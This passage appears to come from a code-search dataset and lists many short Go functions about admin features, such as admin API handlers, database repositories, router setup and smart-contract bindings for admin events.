\"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\n\tvar request msgs.CreatePgAdminRequest\n\t_ = json.NewDecoder(r.Body).Decode(&request)\n\n\tresp := msgs.CreatePgAdminResponse{}\n\n\tif request.ClientVersion != msgs.PGO_VERSION {\n\t\tresp.SetError(apiserver.VERSION_MISMATCH_ERROR)\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\tns, err = apiserver.GetNamespace(apiserver.Clientset, username, request.Namespace)\n\tif err != nil {\n\t\tresp.SetError(err.Error())\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\tresp = CreatePgAdmin(&request, ns, username)\n\tjson.NewEncoder(w).Encode(resp)\n\n}", "func NewAdminAPI(dbMap *gorp.DbMap, userManager *manager.UserManager, localConnectorID string) *AdminAPI {\n\tif localConnectorID == \"\" {\n\t\tpanic(\"must specify non-blank localConnectorID\")\n\t}\n\treturn &AdminAPI{\n\t\tuserManager: userManager,\n\t\tuserRepo: db.NewUserRepo(dbMap),\n\t\tpasswordInfoRepo: db.NewPasswordInfoRepo(dbMap),\n\t\tclientIdentityRepo: db.NewClientIdentityRepo(dbMap),\n\t\tlocalConnectorID: localConnectorID,\n\t}\n}", "func NewAdmin(opts *ServerOptions) (string, *elton.Elton) {\n\tcfg := opts.cfg\n\tadminConfig, _ := cfg.GetAdmin()\n\tif adminConfig == nil {\n\t\treturn \"\", nil\n\t}\n\tadminPath := defaultAdminPath\n\tif adminConfig.Prefix != \"\" {\n\t\tadminPath = adminConfig.Prefix\n\t}\n\n\te := elton.New()\n\n\tif adminConfig != nil {\n\t\te.Use(newAdminValidateMiddlewares(adminConfig)...)\n\t}\n\tcompressConfig := middleware.NewCompressConfig(\n\t\tnew(compress.BrCompressor),\n\t\tnew(middleware.GzipCompressor),\n\t)\n\te.Use(middleware.NewCompress(compressConfig))\n\n\te.Use(middleware.NewDefaultFresh())\n\te.Use(middleware.NewDefaultETag())\n\n\te.Use(middleware.NewDefaultError())\n\te.Use(middleware.NewDefaultResponder())\n\te.Use(middleware.NewDefaultBodyParser())\n\n\tg := elton.NewGroup(adminPath)\n\n\t// 按分类获取配置\n\tg.GET(\"/configs/{category}\", newGetConfigHandler(cfg))\n\t// 添加与更新使用相同处理\n\tg.POST(\"/configs/{category}\", newCreateOrUpdateConfigHandler(cfg))\n\t// 删除配置\n\tg.DELETE(\"/configs/{category}/{name}\", newDeleteConfigHandler(cfg))\n\n\tfiles := new(assetFiles)\n\n\tg.GET(\"/\", func(c *elton.Context) (err error) {\n\t\tfile := \"index.html\"\n\t\tbuf, err := files.Get(file)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tc.SetContentTypeByExt(file)\n\t\tc.BodyBuffer = bytes.NewBuffer(buf)\n\t\treturn\n\t})\n\n\ticons := []string{\n\t\t\"favicon.ico\",\n\t\t\"logo.png\",\n\t}\n\thandleIcon := func(icon string) {\n\t\tg.GET(\"/\"+icon, func(c *elton.Context) (err error) {\n\t\t\tbuf, err := application.DefaultAsset().Find(icon)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tc.SetContentTypeByExt(icon)\n\t\t\tc.Body = buf\n\t\t\treturn\n\t\t})\n\t}\n\tfor _, icon := range icons {\n\t\thandleIcon(icon)\n\t}\n\n\tg.GET(\"/static/*\", middleware.NewStaticServe(files, middleware.StaticServeConfig{\n\t\tPath: \"/static\",\n\t\t// 客户端缓存一年\n\t\tMaxAge: 365 * 24 * 3600,\n\t\t// 缓存服务器缓存一个小时\n\t\tSMaxAge: 60 * 60,\n\t\tDenyQueryString: true,\n\t\tDisableLastModified: true,\n\t}))\n\n\t// 获取应用状态\n\tg.GET(\"/application\", func(c *elton.Context) error {\n\t\tc.Body = application.Default()\n\t\treturn nil\n\t})\n\n\t// 获取upstream的状态\n\tg.GET(\"/upstreams\", func(c *elton.Context) error {\n\t\tc.Body = opts.upstreams.Status()\n\t\treturn nil\n\t})\n\n\t// 上传\n\tg.POST(\"/upload\", func(c *elton.Context) (err error) {\n\t\tfile, fileHeader, err := c.Request.FormFile(\"file\")\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tbuf, err := ioutil.ReadAll(file)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tc.Body = map[string]string{\n\t\t\t\"contentType\": fileHeader.Header.Get(\"Content-Type\"),\n\t\t\t\"data\": base64.StdEncoding.EncodeToString(buf),\n\t\t}\n\t\treturn\n\t})\n\t// alarm 测试\n\tg.POST(\"/alarms/{name}/try\", func(c *elton.Context) (err error) {\n\t\tname := c.Param(\"name\")\n\t\talarms, err := cfg.GetAlarms()\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\talarm := alarms.Get(name)\n\t\tif alarm == nil {\n\t\t\terr = hes.New(\"alarm is nil, please check the alarm configs\")\n\t\t\treturn\n\t\t}\n\t\terr = alarmHandle(alarm, nil)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tc.NoContent()\n\t\treturn\n\t})\n\n\t// list caches 获取缓存列表\n\tg.GET(\"/caches/{name}\", func(c *elton.Context) (err error) {\n\t\tdisp := opts.dispatchers.Get(c.Param(\"name\"))\n\t\tif disp == nil {\n\t\t\terr = hes.New(\"cache not found\")\n\t\t\treturn\n\t\t}\n\t\tstatus, _ := strconv.Atoi(c.QueryParam(\"status\"))\n\t\tlimit, _ := strconv.Atoi(c.QueryParam(\"limit\"))\n\t\tif status <= 0 {\n\t\t\tstatus = cache.StatusCacheable\n\t\t}\n\t\tif limit <= 0 {\n\t\t\tlimit = 100\n\t\t}\n\n\t\tc.Body = disp.List(status, limit, c.QueryParam(\"keyword\"))\n\t\treturn\n\t})\n\t// delete cache 删除缓存\n\tg.DELETE(\"/caches/{name}\", func(c *elton.Context) (err error) {\n\t\tdisp := opts.dispatchers.Get(c.Param(\"name\"))\n\t\tif disp == nil {\n\t\t\terr = hes.New(\"cache not found\")\n\t\t\treturn\n\t\t}\n\t\tdisp.Remove([]byte(c.QueryParam(\"key\")))\n\t\tc.NoContent()\n\t\treturn\n\t})\n\n\te.AddGroup(g)\n\treturn adminPath, e\n}", "func NewAdminService(repo IAdminRepo) IAdminService {\n\treturn &AdminService{\n\t\tRepo: repo,\n\t}\n}", "func (_CrToken *CrTokenFilterer) FilterNewAdmin(opts *bind.FilterOpts) (*CrTokenNewAdminIterator, error) {\n\n\tlogs, sub, err := _CrToken.contract.FilterLogs(opts, \"NewAdmin\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &CrTokenNewAdminIterator{contract: _CrToken.contract, event: \"NewAdmin\", logs: logs, sub: sub}, nil\n}", "func CreateAdmin(a AdminRegForm) (*mongo.InsertOneResult, error) {\n\tnewAdmin := Admin{\n\t\tID: primitive.NewObjectID(),\n\t\tFrasUsername: a.FrasUsername,\n\t\tPassword: a.Password,\n\t\tInstID: a.InstID,\n\t\tModifiedAt: time.Now(),\n\t}\n\treturn adminCollection.InsertOne(context.TODO(), newAdmin)\n}", "func getAdmin(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\tvar id bson.ObjectId\n\tif idParam := e.QueryParam(\"id\"); idParam != \"\" && bson.IsObjectIdHex(idParam) {\n\t\tid = bson.ObjectIdHex(idParam)\n\t}\n\tuuid, err := uuid.FromString(e.QueryParam(\"uuid\"))\n\tif !id.Valid() && err != nil {\n\t\treturn fmt.Errorf(\"Bad parameters\")\n\t}\n\n\ta := models.Admin{}\n\tif id.Valid() {\n\t\terr = db.C(\"Admins\").FindId(id).One(&a)\n\t} else {\n\t\terr = db.C(\"Admins\").Find(bson.M{\"adminUuid\": uuid}).One(&a)\n\t}\n\tif err != nil {\n\t\treturn e.NoContent(http.StatusNotFound)\n\t}\n\treturn e.JSON(http.StatusOK, a)\n}", "func NewAdminService(ipList repository.IPStorable, login, password, ip repository.BucketStorable) service.AdminService {\n\treturn &adminService{\n\t\tipList: ipList,\n\t\tloginBuckets: login,\n\t\tpasswordBuckets: password,\n\t\tipBuckets: ip,\n\t}\n}", "func NewAdminRepo( db *mongo.Database ) Admin.AdminRepo {\n\treturn &AdminRepo{\n\t\tDB : db , \n\t}\n}", "func CreateAdmin(w http.ResponseWriter, r *http.Request) {\n\tvar body CreateAdminRequest\n\tif err := read.JSON(r.Body, &body); err != nil {\n\t\trender.Error(w, admin.WrapError(admin.ErrorBadRequestType, err, \"error reading request body\"))\n\t\treturn\n\t}\n\n\tif err := body.Validate(); err != nil {\n\t\trender.Error(w, err)\n\t\treturn\n\t}\n\n\tauth := mustAuthority(r.Context())\n\tp, err := auth.LoadProvisionerByName(body.Provisioner)\n\tif err != nil {\n\t\trender.Error(w, admin.WrapErrorISE(err, \"error loading provisioner %s\", body.Provisioner))\n\t\treturn\n\t}\n\tadm := &linkedca.Admin{\n\t\tProvisionerId: p.GetID(),\n\t\tSubject: body.Subject,\n\t\tType: body.Type,\n\t}\n\t// Store to authority collection.\n\tif err := auth.StoreAdmin(r.Context(), adm, p); err != nil {\n\t\trender.Error(w, admin.WrapErrorISE(err, \"error storing admin\"))\n\t\treturn\n\t}\n\n\trender.ProtoJSONStatus(w, adm, http.StatusCreated)\n}", "func AdminCollection(c *mongo.Database) {\n\tadminCollection = c.Collection(\"admins\")\n}", "func get_admin (stub shim.ChaincodeStubInterface) (*Admin, error) {\n var admin Admin\n row_was_found,err := util.GetTableRow(stub, CONFIG_TABLE, []string{\"Admin\"}, &admin, util.FAIL_IF_MISSING)\n if err != nil {\n return nil,fmt.Errorf(\"Could not retrieve Admin; error was %v\", err.Error())\n }\n if !row_was_found {\n return nil,fmt.Errorf(\"Admin entry in %s not found\", CONFIG_TABLE)\n }\n return &admin,nil\n}", "func saveAdmin(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\ta := models.Admin{}\n\terr := e.Bind(&a)\n\tif err != nil {\n\t\treturn err\n\t}\n\ta.ServerUpdateDateTime = time.Now().UTC()\n\n\texisting := models.Admin{}\n\terr = db.C(\"Admins\").Find(bson.M{\"adminUuid\": a.AdminUUID}).One(&existing)\n\n\tif err == nil {\n\t\tif existing.ServerUpdateDateTime.After(a.LocalUpdateDateTime) {\n\t\t\t// Server version is more recent\n\t\t\treturn e.JSON(http.StatusConflict, existing)\n\t\t}\n\n\t\ta.AdminID = existing.AdminID\n\t\t_, err = db.C(\"Admins\").UpsertId(existing.AdminID, &a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tif a.AdminID == \"\" {\n\t\t\ta.AdminID = bson.NewObjectId().String()\n\t\t}\n\n\t\terr = db.C(\"Admins\").Insert(&a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn e.JSON(http.StatusOK, a)\n}", "func NewAdminClient(rslvr resolver.Interface, opts ...Option) (AdminClient, error) {\n\tc := &adminClient{\n\t\tr: rslvr,\n\t}\n\n\tfor _, o := range opts {\n\t\to(c)\n\t}\n\n\tif err := c.connect(\"\"); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn c, nil\n}", "func (_TellorMesosphere *TellorMesosphereTransactor) AddAdmin(opts *bind.TransactOpts, _admin_address common.Address) (*types.Transaction, error) {\n\treturn _TellorMesosphere.contract.Transact(opts, \"addAdmin\", _admin_address)\n}", "func createSQL(admin Admin) (string, []interface{}){\n\t\n}", "func AdminList(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminList, w, data)\n}", "func (h *Handler) serveCreateClusterAdmin(w http.ResponseWriter, r *http.Request) {}", "func NewAdmin(addrs []string, options *AdminOptions, log logr.Logger) IAdmin {\n\ta := &Admin{\n\t\thashMaxSlots: DefaultHashMaxSlots,\n\t\tlog: log.WithName(\"redis_util\"),\n\t}\n\n\t// perform initial connections\n\ta.cnx = NewAdminConnections(addrs, options, log)\n\n\treturn a\n}", "func NewAdminReportSettings()(*AdminReportSettings) {\n m := &AdminReportSettings{\n Entity: *NewEntity(),\n }\n return m\n}", "func (_Bindings *BindingsFilterer) WatchNewAdmin(opts *bind.WatchOpts, sink chan<- *BindingsNewAdmin) (event.Subscription, error) {\n\n\tlogs, sub, err := _Bindings.contract.WatchLogs(opts, \"NewAdmin\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn event.NewSubscription(func(quit <-chan struct{}) error {\n\t\tdefer sub.Unsubscribe()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase log := <-logs:\n\t\t\t\t// New log arrived, parse the event and forward to the user\n\t\t\t\tevent := new(BindingsNewAdmin)\n\t\t\t\tif err := _Bindings.contract.UnpackLog(event, \"NewAdmin\", log); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tevent.Raw = log\n\n\t\t\t\tselect {\n\t\t\t\tcase sink <- event:\n\t\t\t\tcase err := <-sub.Err():\n\t\t\t\t\treturn err\n\t\t\t\tcase <-quit:\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\tcase err := <-sub.Err():\n\t\t\t\treturn err\n\t\t\tcase <-quit:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}), nil\n}", "func AdminList(w http.ResponseWriter, data *AdminListData) {\n\trender(tpAdminList, w, data)\n}", "func (_Bindings *BindingsSession) Admin() (common.Address, error) {\n\treturn _Bindings.Contract.Admin(&_Bindings.CallOpts)\n}", "func (_TellorMesosphere *TellorMesosphereSession) AddAdmin(_admin_address common.Address) (*types.Transaction, error) {\n\treturn _TellorMesosphere.Contract.AddAdmin(&_TellorMesosphere.TransactOpts, _admin_address)\n}", "func (s *SecretStore) Admin() *AdminStore {\n\treturn &AdminStore{secretStore: s}\n}", "func (app *Application) Admin(w http.ResponseWriter, r *http.Request) {\n\tdata := struct {\n\t\tTime int64\n\t}{\n\t\tTime: time.Now().Unix(),\n\t}\n\n\tt, err := template.ParseFiles(\"views/index.tpl\")\n\n\tif err != nil {\n\t\tlog.Println(\"Template.Parse:\", err)\n\t\thttp.Error(w, \"Internal Server Error 0x0178\", http.StatusInternalServerError)\n\t}\n\n\tif err := t.Execute(w, data); err != nil {\n\t\tlog.Println(\"Template.Execute:\", err)\n\t\thttp.Error(w, \"Internal Server Error 0x0183\", http.StatusInternalServerError)\n\t}\n}", "func New(db *database.DB, m ...Middleware) Service {\n\tstore := NewStore(db, database.Users)\n\tmodel := NewModel(store)\n\tservice := NewService(model)\n\tservice = Decorate(service, m...)\n\treturn service\n}", "func AdminEdit(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminEdit, w, data)\n}", "func AdminEdit(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminEdit, w, data)\n}", "func (_TellorMesosphere *TellorMesosphereTransactorSession) AddAdmin(_admin_address common.Address) (*types.Transaction, error) {\n\treturn _TellorMesosphere.Contract.AddAdmin(&_TellorMesosphere.TransactOpts, _admin_address)\n}", "func (_Bindings *BindingsCallerSession) Admin() (common.Address, error) {\n\treturn _Bindings.Contract.Admin(&_Bindings.CallOpts)\n}", "func StartAdmin(cfg *Config, ctrl *controlling.Controller) {\n\tconfig = cfg\n\tcontroller = ctrl\n\n\trouter := mux.NewRouter().StrictSlash(true)\n\n\trouter.HandleFunc(\"/api/simulation\", listSimulations).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/simulation\", upsertSimulation).Methods(http.MethodPut)\n\trouter.HandleFunc(\"/api/simulation/{id}\", getSimulation).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/simulation/{id}\", deleteSimulation).Methods(http.MethodDelete)\n\trouter.HandleFunc(\"/api/simulation/{id}/start\", startSimulation).Methods(http.MethodPost)\n\trouter.HandleFunc(\"/api/simulation/{id}/stop\", stopSimulation).Methods(http.MethodPost)\n\trouter.HandleFunc(\"/api/simulation/{id}/provision/{modelId}/{numDevices}\", provisionDevices).Methods(http.MethodPost)\n\trouter.HandleFunc(\"/api/simulation/{id}/provision\", deleteAllDevices).Methods(http.MethodDelete)\n\trouter.HandleFunc(\"/api/simulation/{id}/provision/{modelId}/{numDevices}\", deleteDevices).Methods(http.MethodDelete)\n\trouter.HandleFunc(\"/api/simulation/{id}/deviceConfig\", listDeviceConfigs).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/simulation/{id}/deviceConfig\", upsertDeviceConfig).Methods(http.MethodPut)\n\trouter.HandleFunc(\"/api/simulation/{id}/deviceConfig/{configId}\", getDeviceConfig).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/simulation/{id}/deviceConfig/{configId}\", deleteDeviceConfig).Methods(http.MethodDelete)\n\n\trouter.HandleFunc(\"/api/target\", listTargets).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/target\", upsertTarget).Methods(http.MethodPut)\n\trouter.HandleFunc(\"/api/target/{id}\", getTarget).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/target/{id}\", deleteTarget).Methods(http.MethodDelete)\n\trouter.HandleFunc(\"/api/target/{id}/device\", listTargetDevices).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/target/{id}/device/{deviceId}\", getTargetDevice).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/target/{id}/device\", upsertTargetDevice).Methods(http.MethodPut)\n\trouter.HandleFunc(\"/api/target/{id}/device\", deleteAllTargetDevices).Methods(http.MethodDelete)\n\trouter.HandleFunc(\"/api/target/{id}/device/{deviceId}\", deleteTargetDevice).Methods(http.MethodDelete)\n\trouter.HandleFunc(\"/api/target/{id}/models\", getTargetModels).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/target/{id}/models\", upsertTargetModels).Methods(http.MethodPut)\n\trouter.HandleFunc(\"/api/target/{id}/models\", deleteTargetModels).Methods(http.MethodDelete)\n\n\trouter.HandleFunc(\"/api/model\", listDeviceModels).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/model\", upsertDeviceModel).Methods(http.MethodPut)\n\trouter.HandleFunc(\"/api/model/{id}\", getDeviceModel).Methods(http.MethodGet)\n\trouter.HandleFunc(\"/api/model/{id}\", deleteDeviceModel).Methods(http.MethodDelete)\n\n\t// Serve Starling UX\n\trouter.PathPrefix(\"/\").Handler(http.StripPrefix(\"/\", http.FileServer(getFileSystem())))\n\n\tlog.Info().Msgf(\"serving admin requests at http://localhost:%d/api\", cfg.AdminPort)\n\tlog.Info().Msgf(\"service starling ux at http://localhost:%d\", cfg.AdminPort)\n\t_ = http.ListenAndServe(fmt.Sprintf(\":%d\", cfg.AdminPort), router)\n}", "func Init() (err error) {\n\tvar isAdminEnable *bool = config.GetConfig().Admin.Enable\n\n\tif isAdminEnable != nil && *isAdminEnable == false {\n\t\tlager.Logger.Infof(\"admin api are not enable\")\n\t\treturn nil\n\t}\n\n\terrCh := make(chan error)\n\tmetrics.Init()\n\n\tadminServerURI := config.GetConfig().Admin.ServerURI\n\n\tif adminServerURI == \"\" {\n\t\tadminServerURI = \"0.0.0.0:30102\"\n\t}\n\tln, err := net.Listen(\"tcp\", adminServerURI)\n\tif err != nil {\n\t\treturn\n\t}\n\ttlsConfig, err := getTLSConfig()\n\tif err != nil {\n\t\treturn\n\t}\n\tif tlsConfig != nil {\n\t\tlager.Logger.Infof(\"admin server is using ssl\")\n\t\tln = tls.NewListener(ln, tlsConfig)\n\t} else {\n\t\tlager.Logger.Infof(\"admin server is not using ssl\")\n\t}\n\n\tgo func() {\n\t\tlager.Logger.Infof(\"admin server listening on %s\", ln.Addr().String())\n\t\trestfulWebService := GetWebService()\n\t\tgorestful.Add(&restfulWebService)\n\t\tif err := http.Serve(ln, nil); err != nil {\n\t\t\terrCh <- err\n\t\t\treturn\n\t\t}\n\t}()\n\n\tselect {\n\tcase err = <-errCh:\n\t\tlager.Logger.Warnf(\"got Admin Server Error, err: %v\", err)\n\tcase <-time.After(time.Second):\n\t\tlager.Logger.Infof(\"admin server start success\")\n\t\terr = nil\n\t}\n\treturn\n}", "func MakeAdminHandler(w http.ResponseWriter, req *http.Request) {\n\n\t// Get session values or redirect to Login\n\tsession, err := sessions.Store.Get(req, \"session\")\n\n\tif err != nil {\n\t\tlog.Println(\"error identifying session\")\n\t\thttp.Redirect(w, req, \"/login/\", 302)\n\t\treturn\n\t\t// in case of error\n\t}\n\n\t// Prep for user authentication\n\tsessionMap := getUserSessionValues(session)\n\n\tisAdmin := sessionMap[\"isAdmin\"]\n\n\tvars := mux.Vars(req)\n\tidString := vars[\"id\"]\n\n\tpk, err := strconv.Atoi(idString)\n\tif err != nil {\n\t\tpk = 0\n\t\tlog.Println(err)\n\t}\n\n\tfmt.Println(session)\n\n\tif isAdmin != \"true\" {\n\t\thttp.Redirect(w, req, \"/\", 302)\n\t\treturn\n\t}\n\n\tuser, err := database.PKLoadUser(db, int64(pk))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t\tfmt.Println(\"Unable to load User\")\n\t\thttp.Redirect(w, req, \"/\", http.StatusSeeOther)\n\t}\n\n\tuser.IsAdmin = true\n\tuser.Role = \"admin\"\n\n\terr = database.UpdateUser(db, user)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\n\turl := \"/user_index/\"\n\n\thttp.Redirect(w, req, url, http.StatusFound)\n}", "func RegisterAdminRoutes(services *ewserver.Services, e *gin.Engine) {\n\t// setup admin routes\n\tapiRoutes := e.Group(\"api/v1\")\n\tuserRoutes := apiRoutes.Group(\"/admin/users\")\n\tuserRoutes.GET(\"/details/:user\", AdminUserDetails(services.UserService, services.LogService, e))\n\tuserRoutes.GET(\"/list\", AdminUsersDetails(services.UserService, services.LogService, e))\n\tuserRoutes.PUT(\"/create\", AdminCreateUser(services.UserService, services.RoleService, services.LogService, e))\n\tuserRoutes.POST(\"/reset_password\", AdminResetPassword(services.UserService, services.LogService, e))\n\tuserRoutes.DELETE(\"/delete/:user\", AdminDeleteUser(services.UserService, services.LogService, e))\n\n\tapiAdminRoutes := apiRoutes.Group(\"/admin/api_users\")\n\tapiAdminRoutes.GET(\"/details/:id\", AdminAPIUserDetails(services.APIUserService, services.LogService, e))\n\tapiAdminRoutes.GET(\"/list\", AdminAPIUsersDetails(services.APIUserService, services.LogService, e))\n\tapiAdminRoutes.PUT(\"/create\", AdminCreateAPIUser(services.APIUserService, services.LogService, e))\n\tapiAdminRoutes.DELETE(\"/delete/:id\", AdminDeleteAPIUser(services.APIUserService, services.LogService, e))\n\n\troleRoutes := apiRoutes.Group(\"/admin/roles\")\n\troleRoutes.GET(\"/list\", AdminRoleList(services.RoleService, services.LogService, e))\n\troleRoutes.PUT(\"/permissions\", AdminAddPermission(services.RoleService, services.LogService, e))\n\troleRoutes.DELETE(\"/permissions\", AdminDeletePermission(services.RoleService, services.LogService, e))\n\troleRoutes.POST(\"/role\", AdminAddSubjectToRole(services.RoleService, services.LogService, e))\n\troleRoutes.DELETE(\"/role\", AdminDeleteSubjectFromRole(services.RoleService, services.LogService, e))\n}", "func (_Bindings *BindingsCaller) Admin(opts *bind.CallOpts) (common.Address, error) {\n\tvar (\n\t\tret0 = new(common.Address)\n\t)\n\tout := ret0\n\terr := _Bindings.contract.Call(opts, out, \"admin\")\n\treturn *ret0, err\n}", "func CreateModifyClusterServiceConfigForAdminRequest() (request *ModifyClusterServiceConfigForAdminRequest) {\n\trequest = &ModifyClusterServiceConfigForAdminRequest{\n\t\tRpcRequest: &requests.RpcRequest{},\n\t}\n\trequest.InitWithApiInfo(\"Emr\", \"2016-04-08\", \"ModifyClusterServiceConfigForAdmin\", \"emr\", \"openAPI\")\n\treturn\n}", "func Init(engine *gin.Engine) {\n\tdb := db.New()\n\tsorting.RegisterCallbacks(db)\n\tvalidations.RegisterCallbacks(db)\n\tdb.Callback().Query().Register(\"qor:load_exterals\", loadExternals)\n\tAdmin = admin.New(&qor.Config{\n\t\tDB: db,\n\t})\n\n\tAdmin.SetSiteName(conf.AdminName)\n\tAdmin.SetAuth(Auth{})\n\n\tAdmin.AddMenu(&admin.Menu{Name: \"Dashboard\", Link: \"/admin\"})\n\n\tresources.Init(Admin)\n\n\t// attach this qor instance to gin\n\tmux := http.NewServeMux()\n\n\tAdmin.MountTo(\"/qor\", mux)\n\tengine.Any(\"/qor/*w\", gin.WrapH(mux))\n}", "func New(c *conf.Config) (dao *Dao) {\n\tdao = &Dao{\n\t\tc: c,\n\t\tRoomApi: room_api.New(getConf(\"room\")),\n\t\tUserApi: user_api.New(getConf(\"user\")),\n\t\tRelationApi: relation_api.New(getConf(\"relation\")),\n\t\tFansMedalApi: fans_medal_api.New(getConf(\"fans_medal\")),\n\t\tHttpCli: bm.NewClient(c.HttpClient),\n\t}\n\tMemberCli, err := member_cli.NewClient(c.GrpcCli)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdao.memberCli = MemberCli\n\n\tTitansCli, errTitans := resource_cli.NewClient(c.GrpcCli)\n\tif errTitans != nil {\n\t\tpanic(err)\n\t}\n\tdao.titansCli = TitansCli\n\treturn\n}", "func NewAdminRepo(db *mongo.Database) Admin.AdminRepo {\n\treturn &AdminRepo{\n\t\tDB: db,\n\t}\n}", "func AccepAdmin(c *gin.Context) {\r\n\tvar accountemp []model.UserTemporary\r\n\r\n\tif err := c.Bind(&accountemp); err != nil {\r\n\t\tutils.WrapAPIError(c, err.Error(), http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\t//fmt.Println(account)\r\n\r\n\t//q := model.DB.Save(&account)\r\n\r\n\t//approve akun\r\n\tq := model.DB.Delete(&accountemp)\r\n\trow := q.RowsAffected\r\n\r\n\tutils.WrapAPIData(c, map[string]interface{}{\r\n\t\t\"Data\": accountemp,\r\n\t\t\"Row affected\": row,\r\n\t}, http.StatusOK, \"success\")\r\n\r\n}", "func (ctx *ResourceContext) NewAdminRouter() http.Handler {\n\tr := chi.NewRouter()\n\n\tr.Get(infra.WrapNR(\"/heartbeat\", ctx.GetHeartbeat))\n\tr.Get(infra.WrapNR(\"/heartbeat/_stop\", ctx.StopHeartbeat))\n\tr.Get(infra.WrapNR(\"/heartbeat/_start\", ctx.StartHeartbeat))\n\tr.Get(infra.WrapNR(\"/_info\", ctx.GetInfo))\n\tr.Get(infra.WrapNR(\"/_health\", ctx.GetHealth))\n\n\treturn r\n}", "func NewServiceController(connection_string string) (controller *ServiceController, err error){\n controller = new(ServiceController)\n controller.connection_string = connection_string\n con, err := sql.Open(\"mymysql\", controller.connection_string)\n if err != nil {\n return controller, err\n }\n defer con.Close()\n\n return controller, nil\n}", "func newJeeekUserCollectionAdmin(vres userviews.JeeekUserCollectionView) JeeekUserCollection {\n\tres := make(JeeekUserCollection, len(vres))\n\tfor i, n := range vres {\n\t\tres[i] = newJeeekUserAdmin(n)\n\t}\n\treturn res\n}", "func NewAdmin() *auth.User {\n\tuser := NewUser()\n\tuser.IsAdmin = true\n\treturn user\n}", "func (_Bindings *BindingsFilterer) FilterNewPendingAdmin(opts *bind.FilterOpts) (*BindingsNewPendingAdminIterator, error) {\n\n\tlogs, sub, err := _Bindings.contract.FilterLogs(opts, \"NewPendingAdmin\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &BindingsNewPendingAdminIterator{contract: _Bindings.contract, event: \"NewPendingAdmin\", logs: logs, sub: sub}, nil\n}", "func getAdmins(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\tuuid, err := uuid.FromString(e.QueryParam(\"siteUuid\"))\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Bad parameters\")\n\t}\n\n\ta := models.Admins{\n\t\tAdmins: []models.Admin{},\n\t}\n\n\terr = db.C(\"Admins\").Find(bson.M{\"adminSiteUuid\": uuid}).All(&a.Admins)\n\tif err != nil {\n\t\treturn e.NoContent(http.StatusNotFound)\n\t}\n\treturn e.JSON(http.StatusOK, a)\n}", "func NewEditController(source string) EditController {\r\n return EditController {\r\n Kind: EDIT,\r\n Source: source,\r\n }\r\n}", "func (h *Handler) CreateAdminHandler(w http.ResponseWriter, r *http.Request) {\n\tvar u user.User\n\n\terr := json.NewDecoder(r.Body).Decode(&u)\n\tif err != nil {\n\t\th.log.Error(err)\n\t\t_ = response.HTTPError(w, http.StatusBadRequest, response.ErrorParsingUser.Error())\n\t\treturn\n\t}\n\n\tu.Role = user.Admin\n\n\tctx, cancel := context.WithCancel(r.Context())\n\tdefer cancel()\n\n\tselect {\n\tcase <-ctx.Done():\n\t\t_ = response.HTTPError(w, http.StatusBadGateway, response.ErrTimeout.Error())\n\t\treturn\n\tdefault:\n\t\terr = h.service.Create(ctx, &u)\n\t}\n\n\tif err != nil {\n\t\th.log.Error(err)\n\t\t_ = response.HTTPError(w, http.StatusBadRequest, err.Error())\n\t\treturn\n\t}\n\n\tw.Header().Add(\"Location\", r.URL.String()+u.ID.Hex())\n\t_ = response.JSON(w, http.StatusCreated, response.Map{\"user\": u})\n}", "func (_Contract *ContractSession) Admin() (common.Address, error) {\n\treturn _Contract.Contract.Admin(&_Contract.CallOpts)\n}", "func NewAdminCtl() controller.Controller {\n\treturn &AdminCtl{\n\t\tRoutes: []string{\n\t\t\t\"get;/admin;Index\",\n\t\t\t\"get,post;/admin/add;Create\",\n\t\t\t\"get;/admin/update/{number:[0-9]+};Update\",\n\t\t\t\"post;/admin/update;Update\",\n\t\t\t\"post;/admin/delete;Delete\",\n\t\t},\n\t}\n}", "func ProductionNewAdminClientWrapper(ctx context.Context, brokers []string, config *sarama.Config, adminClientType types.AdminClientType) (types.AdminClientInterface, error) 